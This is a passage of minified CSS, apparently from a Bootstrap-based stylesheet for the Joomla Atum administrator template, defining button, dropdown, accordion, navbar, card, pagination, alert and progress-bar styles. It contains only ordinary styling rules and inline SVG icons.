rgba(42,105,184,.5)}.btn-check:active+.btn-outline-atum-link-color,.btn-check:checked+.btn-outline-atum-link-color,.btn-outline-atum-link-color.active,.btn-outline-atum-link-color.dropdown-toggle.show,.btn-outline-atum-link-color:active{color:#fff;background-color:#2a69b8;border-color:#2a69b8}.btn-check:active+.btn-outline-atum-link-color:focus,.btn-check:checked+.btn-outline-atum-link-color:focus,.btn-outline-atum-link-color.active:focus,.btn-outline-atum-link-color.dropdown-toggle.show:focus,.btn-outline-atum-link-color:active:focus{box-shadow:0 0 0 .25rem rgba(42,105,184,.5)}.btn-outline-atum-link-color.disabled,.btn-outline-atum-link-color:disabled{color:#2a69b8;background-color:transparent}.btn-outline-atum-text-dark{color:#495057;border-color:#495057}.btn-outline-atum-text-dark:hover{color:#fff;background-color:#495057;border-color:#495057}.btn-check:focus+.btn-outline-atum-text-dark,.btn-outline-atum-text-dark:focus{box-shadow:0 0 0 .25rem rgba(73,80,87,.5)}.btn-check:active+.btn-outline-atum-text-dark,.btn-check:checked+.btn-outline-atum-text-dark,.btn-outline-atum-text-dark.active,.btn-outline-atum-text-dark.dropdown-toggle.show,.btn-outline-atum-text-dark:active{color:#fff;background-color:#495057;border-color:#495057}.btn-check:active+.btn-outline-atum-text-dark:focus,.btn-check:checked+.btn-outline-atum-text-dark:focus,.btn-outline-atum-text-dark.active:focus,.btn-outline-atum-text-dark.dropdown-toggle.show:focus,.btn-outline-atum-text-dark:active:focus{box-shadow:0 0 0 .25rem rgba(73,80,87,.5)}.btn-outline-atum-text-dark.disabled,.btn-outline-atum-text-dark:disabled{color:#495057;background-color:transparent}.btn-outline-action{color:#132f53;border-color:#132f53}.btn-outline-action:hover{color:#fff;background-color:#132f53;border-color:#132f53}.btn-check:focus+.btn-outline-action,.btn-outline-action:focus{box-shadow:0 0 0 .25rem rgba(19,47,83,.5)}.btn-check:active+.btn-outline-action,.btn-check:checked+.btn-outline-action,.btn-outline-action.active,.btn-outline-action.dropdown-toggle.show,.btn-outline-action:active{color:#fff;background-color:#132f53;border-color:#132f53}.btn-check:active+.btn-outline-action:focus,.btn-check:checked+.btn-outline-action:focus,.btn-outline-action.active:focus,.btn-outline-action.dropdown-toggle.show:focus,.btn-outline-action:active:focus{box-shadow:0 0 0 .25rem rgba(19,47,83,.5)}.btn-outline-action.disabled,.btn-outline-action:disabled{color:#132f53;background-color:transparent}.btn-outline-error{color:#3b0d0c;border-color:#3b0d0c}.btn-outline-error:hover{color:#fff;background-color:#3b0d0c;border-color:#3b0d0c}.btn-check:focus+.btn-outline-error,.btn-outline-error:focus{box-shadow:0 0 0 .25rem rgba(59,13,12,.5)}.btn-check:active+.btn-outline-error,.btn-check:checked+.btn-outline-error,.btn-outline-error.active,.btn-outline-error.dropdown-toggle.show,.btn-outline-error:active{color:#fff;background-color:#3b0d0c;border-color:#3b0d0c}.btn-check:active+.btn-outline-error:focus,.btn-check:checked+.btn-outline-error:focus,.btn-outline-error.active:focus,.btn-outline-error.dropdown-toggle.show:focus,.btn-outline-error:active:focus{box-shadow:0 0 0 .25rem rgba(59,13,12,.5)}.btn-outline-error.disabled,.btn-outline-error:disabled{color:#3b0d0c;background-color:transparent}.btn-outline-alert-success{color:#0f2f21;border-color:#0f2f21}.btn-outline-alert-success:hover{color:#fff;background-color:#0f2f21;border-color:#0f2f21}.btn-check:focus+.btn-outline-alert-success,.btn-outline-alert-success:focus{box-shadow:0 0 0 .25rem rgba(15,47,33,.5)}.btn-check:active+.btn-outline-alert-success,.btn-check:checked+.btn-outline-alert-success,.btn-outline-alert-success.active,.btn-outline-alert-success.dropdown-toggle.show,.btn-outline-alert-success:active{color:#fff;background-color:#0f2f21;border-color:#0f2f21}.btn-check:active+.btn-outline-alert-success:focus,.btn-check:checked+.btn-outline-alert-success:focus,.btn-outline-alert-success.active:focus,.btn-outline-alert-success.dropdown-toggle.show:focus,.btn-outline-alert-success:active:focus{box-shadow:0 0 0 .25rem rgba(15,47,33,.5)}.btn-outline-alert-success.disabled,.btn-outline-alert-success:disabled{color:#0f2f21;background-color:transparent}.btn-link{font-weight:400;color:var(--template-link-color);text-decoration:none}.btn-link:hover{color:var(--template-link-hover-color)}.btn-link.disabled,.btn-link:disabled{color:#666e76}.btn-group-lg>.btn,.btn-lg{padding:.5rem 1rem;font-size:1.25rem;border-radius:.3rem}.btn-group-sm>.btn,.btn-sm{padding:.25rem .5rem;font-size:.8rem;border-radius:.2rem}.fade{transition:opacity .15s linear}@media (prefers-reduced-motion:reduce){.fade{transition:none}}.fade:not(.show){opacity:0}.collapse:not(.show){display:none}.collapsing{height:0;overflow:hidden;transition:height .35s ease}@media (prefers-reduced-motion:reduce){.collapsing{transition:none}}.dropdown,.dropend,.dropstart,.dropup{position:relative}.dropdown-toggle{white-space:nowrap}.dropdown-toggle:after{display:inline-block;margin-left:.255em;vertical-align:.255em;content:"";border-top:.3em solid;border-right:.3em solid transparent;border-bottom:0;border-left:.3em solid transparent}.dropdown-toggle:empty:after{margin-left:0}.dropdown-menu{position:absolute;z-index:1000;display:none;min-width:10rem;padding:0;margin:0;font-size:1rem;color:var(--template-text-dark);text-align:left;list-style:none;background-color:#fff;background-clip:padding-box;border:1px solid rgba(0,0,0,.15);border-radius:.25rem}.dropdown-menu[data-bs-popper]{top:100%;left:0;margin-top:0}.dropdown-menu-start{--bs-position:start}.dropdown-menu-start[data-bs-popper]{right:auto;left:0}.dropdown-menu-end{--bs-position:end}.dropdown-menu-end[data-bs-popper]{right:0;left:auto}@media (min-width:576px){.dropdown-menu-sm-start{--bs-position:start}.dropdown-menu-sm-start[data-bs-popper]{right:auto;left:0}.dropdown-menu-sm-end{--bs-position:end}.dropdown-menu-sm-end[data-bs-popper]{right:0;left:auto}}@media (min-width:768px){.dropdown-menu-md-start{--bs-position:start}.dropdown-menu-md-start[data-bs-popper]{right:auto;left:0}.dropdown-menu-md-end{--bs-position:end}.dropdown-menu-md-end[data-bs-popper]{right:0;left:auto}}@media (min-width:992px){.dropdown-menu-lg-start{--bs-position:start}.dropdown-menu-lg-start[data-bs-popper]{right:auto;left:0}.dropdown-menu-lg-end{--bs-position:end}.dropdown-menu-lg-end[data-bs-popper]{right:0;left:auto}}@media (min-width:1200px){.dropdown-menu-xl-start{--bs-position:start}.dropdown-menu-xl-start[data-bs-popper]{right:auto;left:0}.dropdown-menu-xl-end{--bs-position:end}.dropdown-menu-xl-end[data-bs-popper]{right:0;left:auto}}@media (min-width:1400px){.dropdown-menu-xxl-start{--bs-position:start}.dropdown-menu-xxl-start[data-bs-popper]{right:auto;left:0}.dropdown-menu-xxl-end{--bs-position:end}.dropdown-menu-xxl-end[data-bs-popper]{right:0;left:auto}}.dropup .dropdown-menu[data-bs-popper]{top:auto;bottom:100%;margin-top:0;margin-bottom:0}.dropup .dropdown-toggle:after{display:inline-block;margin-left:.255em;vertical-align:.255em;content:"";border-top:0;border-right:.3em solid transparent;border-bottom:.3em solid;border-left:.3em solid transparent}.dropup .dropdown-toggle:empty:after{margin-left:0}.dropend .dropdown-menu[data-bs-popper]{top:0;right:auto;left:100%;margin-top:0;margin-left:0}.dropend .dropdown-toggle:after{display:inline-block;margin-left:.255em;vertical-align:.255em;content:"";border-top:.3em solid transparent;border-right:0;border-bottom:.3em solid transparent;border-left:.3em solid}.dropend .dropdown-toggle:empty:after{margin-left:0}.dropend .dropdown-toggle:after{vertical-align:0}.dropstart .dropdown-menu[data-bs-popper]{top:0;right:100%;left:auto;margin-top:0;margin-right:0}.dropstart .dropdown-toggle:after{display:inline-block;margin-left:.255em;vertical-align:.255em;content:"";display:none}.dropstart .dropdown-toggle:before{display:inline-block;margin-right:.255em;vertical-align:.255em;content:"";border-top:.3em solid transparent;border-right:.3em solid;border-bottom:.3em solid transparent}.dropstart .dropdown-toggle:empty:after{margin-left:0}.dropstart .dropdown-toggle:before{vertical-align:0}.dropdown-divider{height:0;margin:.5rem 0;overflow:hidden;border-top:1px solid rgba(0,0,0,.15)}.dropdown-item{display:block;width:100%;padding:.5rem .75rem;clear:both;font-weight:400;color:#212529;text-align:inherit;white-space:nowrap;background-color:transparent;border:0}.dropdown-item:first-child{border-top-left-radius:calc(.25rem - 1px);border-top-right-radius:calc(.25rem - 1px)}.dropdown-item:last-child{border-bottom-right-radius:calc(.25rem - 1px);border-bottom-left-radius:calc(.25rem - 1px)}.dropdown-item:focus,.dropdown-item:hover{color:var(--template-text-dark);background-color:#e8e8e8}.dropdown-item.active,.dropdown-item:active{color:#fff;text-decoration:none;background-color:#2a69b7}.dropdown-item.disabled,.dropdown-item:disabled{color:#adb5bd;pointer-events:none;background-color:transparent}.dropdown-menu.show{display:block}.dropdown-header{display:block;padding:0 .75rem;margin-bottom:0;font-size:.8rem;color:#666e76;white-space:nowrap}.dropdown-item-text{display:block;padding:.5rem .75rem;color:#212529}.dropdown-menu-dark{color:#dee2e6;background-color:#343a40;border-color:rgba(0,0,0,.15)}.dropdown-menu-dark .dropdown-item{color:#dee2e6}.dropdown-menu-dark .dropdown-item:focus,.dropdown-menu-dark .dropdown-item:hover{color:#fff;background-color:hsla(0,0%,100%,.15)}.dropdown-menu-dark .dropdown-item.active,.dropdown-menu-dark .dropdown-item:active{color:#fff;background-color:#2a69b7}.dropdown-menu-dark .dropdown-item.disabled,.dropdown-menu-dark .dropdown-item:disabled{color:#adb5bd}.dropdown-menu-dark .dropdown-divider{border-color:rgba(0,0,0,.15)}.dropdown-menu-dark .dropdown-item-text{color:#dee2e6}.dropdown-menu-dark .dropdown-header{color:#adb5bd}.accordion-button{position:relative;display:flex;align-items:center;width:100%;padding:1rem 1.25rem;font-size:1rem;color:var(--template-text-dark);text-align:left;background-color:#fff;border:0;border-radius:0;overflow-anchor:none;transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out,border-radius .15s ease}@media (prefers-reduced-motion:reduce){.accordion-button{transition:none}}.accordion-button:not(.collapsed){color:#265fa5;background-color:#eaf0f8;box-shadow:inset 0 -1px 0 rgba(0,0,0,.125)}.accordion-button:not(.collapsed):after{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%23265fa5'%3E%3Cpath fill-rule='evenodd' d='M1.646 4.646a.5.5 0 01.708 0L8 10.293l5.646-5.647a.5.5 0 01.708.708l-6 6a.5.5 0 01-.708 0l-6-6a.5.5 0 010-.708z'/%3E%3C/svg%3E");-webkit-transform:rotate(-180deg);transform:rotate(-180deg)}.accordion-button:after{flex-shrink:0;width:1.25rem;height:1.25rem;margin-left:auto;content:"";background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='var(--template-text-dark)'%3E%3Cpath fill-rule='evenodd' d='M1.646 4.646a.5.5 0 01.708 0L8 10.293l5.646-5.647a.5.5 0 01.708.708l-6 6a.5.5 0 01-.708 0l-6-6a.5.5 0 010-.708z'/%3E%3C/svg%3E");background-repeat:no-repeat;background-size:1.25rem;transition:-webkit-transform .2s ease-in-out;transition:transform .2s ease-in-out;transition:transform .2s ease-in-out,-webkit-transform .2s ease-in-out}@media (prefers-reduced-motion:reduce){.accordion-button:after{transition:none}}.accordion-button:hover{z-index:2}.accordion-button:focus{z-index:3;border-color:#95b4db;outline:0;box-shadow:0 0 0 .25rem rgba(42,105,183,.25)}.accordion-header{margin-bottom:0}.accordion-item{background-color:#fff;border:1px solid rgba(0,0,0,.125)}.accordion-item:first-of-type{border-top-left-radius:.25rem;border-top-right-radius:.25rem}.accordion-item:first-of-type .accordion-button{border-top-left-radius:calc(.25rem - 1px);border-top-right-radius:calc(.25rem - 1px)}.accordion-item:not(:first-of-type){border-top:0}.accordion-item:last-of-type{border-bottom-right-radius:.25rem;border-bottom-left-radius:.25rem}.accordion-item:last-of-type .accordion-button.collapsed{border-bottom-right-radius:calc(.25rem - 1px);border-bottom-left-radius:calc(.25rem - 1px)}.accordion-item:last-of-type .accordion-collapse{border-bottom-right-radius:.25rem;border-bottom-left-radius:.25rem}.accordion-body{padding:1rem 1.25rem}.accordion-flush .accordion-collapse{border-width:0}.accordion-flush .accordion-item{border-right:0;border-left:0;border-radius:0}.accordion-flush .accordion-item:first-child{border-top:0}.accordion-flush .accordion-item:last-child{border-bottom:0}.accordion-flush .accordion-item .accordion-button{border-radius:0}.btn-group,.btn-group-vertical{position:relative;display:inline-flex;vertical-align:middle}.btn-group-vertical>.btn,.btn-group>.btn{position:relative;flex:1 1 auto}.btn-group-vertical>.btn-check:checked+.btn,.btn-group-vertical>.btn-check:focus+.btn,.btn-group-vertical>.btn.active,.btn-group-vertical>.btn:active,.btn-group-vertical>.btn:focus,.btn-group-vertical>.btn:hover,.btn-group>.btn-check:checked+.btn,.btn-group>.btn-check:focus+.btn,.btn-group>.btn.active,.btn-group>.btn:active,.btn-group>.btn:focus,.btn-group>.btn:hover{z-index:1}.btn-toolbar{display:flex;flex-wrap:wrap;justify-content:flex-start}.btn-toolbar .input-group{width:auto}.btn-group>.btn-group:not(:first-child),.btn-group>.btn:not(:first-child){margin-left:-1px}.btn-group>.btn-group:not(:last-child)>.btn,.btn-group>.btn:not(:last-child):not(.dropdown-toggle){border-top-right-radius:0;border-bottom-right-radius:0}.btn-group>.btn-group:not(:first-child)>.btn,.btn-group>.btn:nth-child(n+3),.btn-group>:not(.btn-check)+.btn{border-top-left-radius:0;border-bottom-left-radius:0}.dropdown-toggle-split{padding-right:.75rem;padding-left:.75rem}.dropdown-toggle-split:after,.dropend .dropdown-toggle-split:after,.dropup .dropdown-toggle-split:after{margin-left:0}.dropstart .dropdown-toggle-split:before{margin-right:0}.btn-group-sm>.btn+.dropdown-toggle-split,.btn-sm+.dropdown-toggle-split{padding-right:.375rem;padding-left:.375rem}.btn-group-lg>.btn+.dropdown-toggle-split,.btn-lg+.dropdown-toggle-split{padding-right:.75rem;padding-left:.75rem}.btn-group-vertical{flex-direction:column;align-items:flex-start;justify-content:center}.btn-group-vertical>.btn,.btn-group-vertical>.btn-group{width:100%}.btn-group-vertical>.btn-group:not(:first-child),.btn-group-vertical>.btn:not(:first-child){margin-top:-1px}.btn-group-vertical>.btn-group:not(:last-child)>.btn,.btn-group-vertical>.btn:not(:last-child):not(.dropdown-toggle){border-bottom-right-radius:0;border-bottom-left-radius:0}.btn-group-vertical>.btn-group:not(:first-child)>.btn,.btn-group-vertical>.btn~.btn{border-top-left-radius:0;border-top-right-radius:0}.nav{display:flex;flex-wrap:wrap;padding-left:0;margin-bottom:0;list-style:none}.nav-link{display:block;padding:.5rem 1rem;color:var(--template-link-color);transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out}@media (prefers-reduced-motion:reduce){.nav-link{transition:none}}.nav-link:focus,.nav-link:hover{color:var(--template-link-hover-color)}.nav-link.disabled{color:#666e76;pointer-events:none;cursor:default}.nav-tabs{border-bottom:1px solid #dee2e6}.nav-tabs .nav-link{margin-bottom:-1px;background:none;border:1px solid transparent;border-top-left-radius:.25rem;border-top-right-radius:.25rem}.nav-tabs .nav-link:focus,.nav-tabs .nav-link:hover{border-color:#e8e8e8 #e8e8e8 #dee2e6;isolation:isolate}.nav-tabs .nav-link.disabled{color:#666e76;background-color:transparent;border-color:transparent}.nav-tabs .nav-item.show .nav-link,.nav-tabs .nav-link.active{color:#495057;background-color:#fff;border-color:#dee2e6 #dee2e6 #fff}.nav-tabs .dropdown-menu{margin-top:-1px;border-top-left-radius:0;border-top-right-radius:0}.nav-pills .nav-link{background:none;border:0;border-radius:.25rem}.nav-pills .nav-link.active,.nav-pills .show>.nav-link{color:#fff;background-color:#2a69b7}.nav-fill .nav-item,.nav-fill>.nav-link{flex:1 1 auto;text-align:center}.nav-justified .nav-item,.nav-justified>.nav-link{flex-basis:0;flex-grow:1;text-align:center}.nav-fill .nav-item .nav-link,.nav-justified .nav-item .nav-link{width:100%}.tab-content>.tab-pane{display:none}.tab-content>.active{display:block}.navbar{position:relative;display:flex;flex-wrap:wrap;align-items:center;justify-content:space-between;padding-top:.5rem;padding-bottom:.5rem}.navbar>.container,.navbar>.container-fluid,.navbar>.container-lg,.navbar>.container-md,.navbar>.container-sm,.navbar>.container-xl,.navbar>.container-xxl{display:flex;flex-wrap:inherit;align-items:center;justify-content:space-between}.navbar-brand{padding-top:.3125rem;padding-bottom:.3125rem;margin-right:1rem;font-size:1.25rem;white-space:nowrap}.navbar-nav{display:flex;flex-direction:column;padding-left:0;margin-bottom:0;list-style:none}.navbar-nav .nav-link{padding-right:0;padding-left:0}.navbar-nav .dropdown-menu{position:static}.navbar-text{padding-top:.5rem;padding-bottom:.5rem}.navbar-collapse{flex-basis:100%;flex-grow:1;align-items:center}.navbar-toggler{padding:.25rem .75rem;font-size:1.25rem;line-height:1;background-color:transparent;border:1px solid transparent;border-radius:.25rem;transition:box-shadow .15s ease-in-out}@media (prefers-reduced-motion:reduce){.navbar-toggler{transition:none}}.navbar-toggler:hover{text-decoration:none}.navbar-toggler:focus{text-decoration:none;outline:0;box-shadow:0 0 0 .25rem}.navbar-toggler-icon{display:inline-block;width:1.5em;height:1.5em;vertical-align:middle;background-repeat:no-repeat;background-position:50%;background-size:100%}.navbar-nav-scroll{max-height:var(--scroll-height,75vh);overflow-y:auto}@media (min-width:576px){.navbar-expand-sm{flex-wrap:nowrap;justify-content:flex-start}.navbar-expand-sm .navbar-nav{flex-direction:row}.navbar-expand-sm .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-sm .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.navbar-expand-sm .navbar-nav-scroll{overflow:visible}.navbar-expand-sm .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-sm .navbar-toggler{display:none}}@media (min-width:768px){.navbar-expand-md{flex-wrap:nowrap;justify-content:flex-start}.navbar-expand-md .navbar-nav{flex-direction:row}.navbar-expand-md .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-md .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.navbar-expand-md .navbar-nav-scroll{overflow:visible}.navbar-expand-md .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-md .navbar-toggler{display:none}}@media (min-width:992px){.navbar-expand-lg{flex-wrap:nowrap;justify-content:flex-start}.navbar-expand-lg .navbar-nav{flex-direction:row}.navbar-expand-lg .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-lg .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.navbar-expand-lg .navbar-nav-scroll{overflow:visible}.navbar-expand-lg .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-lg .navbar-toggler{display:none}}@media (min-width:1200px){.navbar-expand-xl{flex-wrap:nowrap;justify-content:flex-start}.navbar-expand-xl .navbar-nav{flex-direction:row}.navbar-expand-xl .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-xl .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.navbar-expand-xl .navbar-nav-scroll{overflow:visible}.navbar-expand-xl .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-xl .navbar-toggler{display:none}}@media (min-width:1400px){.navbar-expand-xxl{flex-wrap:nowrap;justify-content:flex-start}.navbar-expand-xxl .navbar-nav{flex-direction:row}.navbar-expand-xxl .navbar-nav .dropdown-menu{position:absolute}.navbar-expand-xxl .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.navbar-expand-xxl .navbar-nav-scroll{overflow:visible}.navbar-expand-xxl .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand-xxl .navbar-toggler{display:none}}.navbar-expand{flex-wrap:nowrap;justify-content:flex-start}.navbar-expand .navbar-nav{flex-direction:row}.navbar-expand .navbar-nav .dropdown-menu{position:absolute}.navbar-expand .navbar-nav .nav-link{padding-right:.5rem;padding-left:.5rem}.navbar-expand .navbar-nav-scroll{overflow:visible}.navbar-expand .navbar-collapse{display:flex!important;flex-basis:auto}.navbar-expand .navbar-toggler{display:none}.navbar-light .navbar-brand,.navbar-light .navbar-brand:focus,.navbar-light .navbar-brand:hover{color:rgba(0,0,0,.9)}.navbar-light .navbar-nav .nav-link{color:rgba(0,0,0,.55)}.navbar-light .navbar-nav .nav-link:focus,.navbar-light .navbar-nav .nav-link:hover{color:rgba(0,0,0,.7)}.navbar-light .navbar-nav .nav-link.disabled{color:rgba(0,0,0,.3)}.navbar-light .navbar-nav .nav-link.active,.navbar-light .navbar-nav .show>.nav-link{color:rgba(0,0,0,.9)}.navbar-light .navbar-toggler{color:rgba(0,0,0,.55);border-color:rgba(0,0,0,.1)}.navbar-light .navbar-toggler-icon{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 30 30'%3E%3Cpath stroke='rgba(0, 0, 0, 0.55)' stroke-linecap='round' stroke-miterlimit='10' stroke-width='2' d='M4 7h22M4 15h22M4 23h22'/%3E%3C/svg%3E")}.navbar-light .navbar-text{color:rgba(0,0,0,.55)}.navbar-light .navbar-text a,.navbar-light .navbar-text a:focus,.navbar-light .navbar-text a:hover{color:rgba(0,0,0,.9)}.navbar-dark .navbar-brand,.navbar-dark .navbar-brand:focus,.navbar-dark .navbar-brand:hover{color:#fff}.navbar-dark .navbar-nav .nav-link{color:hsla(0,0%,100%,.55)}.navbar-dark .navbar-nav .nav-link:focus,.navbar-dark .navbar-nav .nav-link:hover{color:hsla(0,0%,100%,.75)}.navbar-dark .navbar-nav .nav-link.disabled{color:hsla(0,0%,100%,.25)}.navbar-dark .navbar-nav .nav-link.active,.navbar-dark .navbar-nav .show>.nav-link{color:#fff}.navbar-dark .navbar-toggler{color:hsla(0,0%,100%,.55);border-color:hsla(0,0%,100%,.1)}.navbar-dark .navbar-toggler-icon{background-image:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 30 30'%3E%3Cpath stroke='rgba(255, 255, 255, 0.55)' stroke-linecap='round' stroke-miterlimit='10' stroke-width='2' d='M4 7h22M4 15h22M4 23h22'/%3E%3C/svg%3E")}.navbar-dark .navbar-text{color:hsla(0,0%,100%,.55)}.navbar-dark .navbar-text a,.navbar-dark .navbar-text a:focus,.navbar-dark .navbar-text a:hover{color:#fff}.card{position:relative;display:flex;flex-direction:column;min-width:0;word-wrap:break-word;background-color:#fff;background-clip:border-box;border:0 solid transparent;border-radius:.25rem}.card>hr{margin-right:0;margin-left:0}.card>.list-group{border-top:inherit;border-bottom:inherit}.card>.list-group:first-child{border-top-width:0;border-top-left-radius:.25rem;border-top-right-radius:.25rem}.card>.list-group:last-child{border-bottom-width:0;border-bottom-right-radius:.25rem;border-bottom-left-radius:.25rem}.card>.card-header+.list-group,.card>.list-group+.card-footer{border-top:0}.card-body{flex:1 1 auto;padding:1rem}.card-title{margin-bottom:.5rem}.card-subtitle{margin-top:-.25rem}.card-subtitle,.card-text:last-child{margin-bottom:0}.card-link:hover{text-decoration:none}.card-link+.card-link{margin-left:1rem}.card-header{padding:.5rem 1rem;margin-bottom:0;background-color:rgba(0,0,0,.03);border-bottom:0 solid transparent}.card-header:first-child{border-radius:.25rem .25rem 0 0}.card-footer{padding:.5rem 1rem;background-color:rgba(0,0,0,.03);border-top:0 solid transparent}.card-footer:last-child{border-radius:0 0 .25rem .25rem}.card-header-tabs{margin-bottom:-.5rem;border-bottom:0}.card-header-pills,.card-header-tabs{margin-right:-.5rem;margin-left:-.5rem}.card-img-overlay{position:absolute;top:0;right:0;bottom:0;left:0;padding:1rem;border-radius:.25rem}.card-img,.card-img-bottom,.card-img-top{width:100%}.card-img,.card-img-top{border-top-left-radius:.25rem;border-top-right-radius:.25rem}.card-img,.card-img-bottom{border-bottom-right-radius:.25rem;border-bottom-left-radius:.25rem}.card-group>.card{margin-bottom:1rem}@media (min-width:576px){.card-group{display:flex;flex-flow:row wrap}.card-group>.card{flex:1 0 0%;margin-bottom:0}.card-group>.card+.card{margin-left:0;border-left:0}.card-group>.card:not(:last-child){border-top-right-radius:0;border-bottom-right-radius:0}.card-group>.card:not(:last-child) .card-header,.card-group>.card:not(:last-child) .card-img-top{border-top-right-radius:0}.card-group>.card:not(:last-child) .card-footer,.card-group>.card:not(:last-child) .card-img-bottom{border-bottom-right-radius:0}.card-group>.card:not(:first-child){border-top-left-radius:0;border-bottom-left-radius:0}.card-group>.card:not(:first-child) .card-header,.card-group>.card:not(:first-child) .card-img-top{border-top-left-radius:0}.card-group>.card:not(:first-child) .card-footer,.card-group>.card:not(:first-child) .card-img-bottom{border-bottom-left-radius:0}}.breadcrumb{display:flex;flex-wrap:wrap;padding:0;margin-bottom:1rem;list-style:none;background-color:var(--white)}.breadcrumb-item+.breadcrumb-item{padding-left:.5rem}.breadcrumb-item+.breadcrumb-item:before{float:left;padding-right:.5rem;color:#666e76;content:var(--breadcrumb-divider,"/")}.breadcrumb-item.active{color:#666e76}.pagination{display:flex;padding-left:0;list-style:none}.page-link{position:relative;display:block;color:var(--template-link-color);background-color:#fff;border:1px solid #dee2e6;transition:color .15s ease-in-out,background-color .15s ease-in-out,border-color .15s ease-in-out,box-shadow .15s ease-in-out}@media (prefers-reduced-motion:reduce){.page-link{transition:none}}.page-link:hover{z-index:2;border-color:#dee2e6}.page-link:focus,.page-link:hover{color:var(--template-link-hover-color);background-color:#e8e8e8}.page-link:focus{z-index:3;outline:0;box-shadow:0 0 0 .25rem rgba(42,105,183,.25)}.page-item:not(:first-child) .page-link{margin-left:-1px}.page-item.active .page-link{z-index:3;color:#fff;background-color:#2a69b7;border-color:#2a69b7}.page-item.disabled .page-link{color:#666e76;pointer-events:none;background-color:#fff;border-color:#dee2e6}.page-link{padding:.375rem .75rem}.page-item:first-child .page-link{border-top-left-radius:.25rem;border-bottom-left-radius:.25rem}.page-item:last-child .page-link{border-top-right-radius:.25rem;border-bottom-right-radius:.25rem}.pagination-lg .page-link{padding:.75rem 1.5rem;font-size:1.25rem}.pagination-lg .page-item:first-child .page-link{border-top-left-radius:.3rem;border-bottom-left-radius:.3rem}.pagination-lg .page-item:last-child .page-link{border-top-right-radius:.3rem;border-bottom-right-radius:.3rem}.pagination-sm .page-link{padding:.25rem .5rem;font-size:.8rem}.pagination-sm .page-item:first-child .page-link{border-top-left-radius:.2rem;border-bottom-left-radius:.2rem}.pagination-sm .page-item:last-child .page-link{border-top-right-radius:.2rem;border-bottom-right-radius:.2rem}.badge{display:inline-block;padding:.3rem .2rem;font-size:.75rem;font-weight:700;line-height:1;color:#fff;text-align:center;white-space:nowrap;vertical-align:baseline;border-radius:.2rem}.badge:empty{display:none}.btn .badge{position:relative;top:-1px}.alert{position:relative;padding:1rem;margin-bottom:1rem;border:1px solid transparent;border-radius:.25rem}.alert-heading{color:inherit}.alert-link{font-weight:700}.alert-dismissible{padding-right:3rem}.alert-dismissible .btn-close{position:absolute;top:0;right:0;z-index:2;padding:1.25rem 1rem}.alert-primary{color:#0b1c32;background-color:#d0d5dd;border-color:#b8c1cb}.alert-primary .alert-link{color:#091628}.alert-secondary{color:#2c3034;background-color:#dbdcdd;border-color:#c8cbcd}.alert-secondary .alert-link{color:#23262a}.alert-success{color:#294b32;background-color:#dae5dd;border-color:#c7d8cc}.alert-success .alert-link{color:#213c28}.alert-info{color:#193f6e;background-color:#d4e1f1;border-color:#bfd2ea}.alert-info .alert-link{color:#143258}.alert-warning{color:#664808;background-color:#fff0d0;border-color:#ffe9b9}.alert-warning .alert-link{color:#523a06}.alert-danger{color:#761817;background-color:#f3d4d4;border-color:#eebfbe}.alert-danger .alert-link{color:#5e1312}.alert-light{color:#636464;background-color:#fefefe;border-color:#fdfdfe}.alert-light .alert-link{color:#4f5050}.alert-dark{color:#141619;background-color:#d3d3d4;border-color:#bcbebf}.alert-dark .alert-link{color:#101214}.alert-atum-link-color{color:#193f6e;background-color:#d4e1f1;border-color:#bfd2ea}.alert-atum-link-color .alert-link{color:#143258}.alert-atum-text-dark{color:#2c3034;background-color:#dbdcdd;border-color:#c8cbcd}.alert-atum-text-dark .alert-link{color:#23262a}.alert-action{color:#0b1c32;background-color:#d0d5dd;border-color:#b8c1cb}.alert-action .alert-link{color:#091628}.alert-error{color:#230807;background-color:#d8cfce;border-color:#c4b6b6}.alert-error .alert-link{color:#1c0606}.alert-alert-success{color:#091c14;background-color:#cfd5d3;border-color:#b7c1bc}.alert-alert-success .alert-link{color:#071610}@-webkit-keyframes progress-bar-stripes{0%{background-position-x:1rem}}@keyframes progress-bar-stripes{0%{background-position-x:1rem}}.progress{height:1rem;font-size:.75rem;background-color:#e8e8e8;border-radius:.25rem}.progress,.progress-bar{display:flex;overflow:hidden}.progress-bar{flex-direction:column;justify-content:center;color:#fff;text-align:center;white-space:nowrap;background-color:#2a69b7;transition:width .6s ease}@media (prefers-reduced-motion:reduce){.progress-bar{transition:none}}.progress-bar-striped{background-image:linear-gradient(45deg,hsla(0,0%,100%,.15) 25%,transparent 0,transparent 50%,hsla(0,0%,100%,.15) 0,hsla(0,0%,100%,.15) 75%,transparent 0,transparent);background-size:1rem 1rem}.progress-bar-animated{-webkit-animation:progress-bar-stripes 1s linear infinite;animation:progress-bar-stripes 1s linear infinite}@media (prefers-reduced-motion:reduce){.progress-bar-animated{-webkit-animation:none;animation:none}}.list-group{display:flex;flex-direction:column;padding-left:0;margin-bottom:0;border-radius:.25rem}.list-group-numbered{list-style-type:none;counter-reset:section}.list-group-numbered>li:before{content:counters(section,".") ". 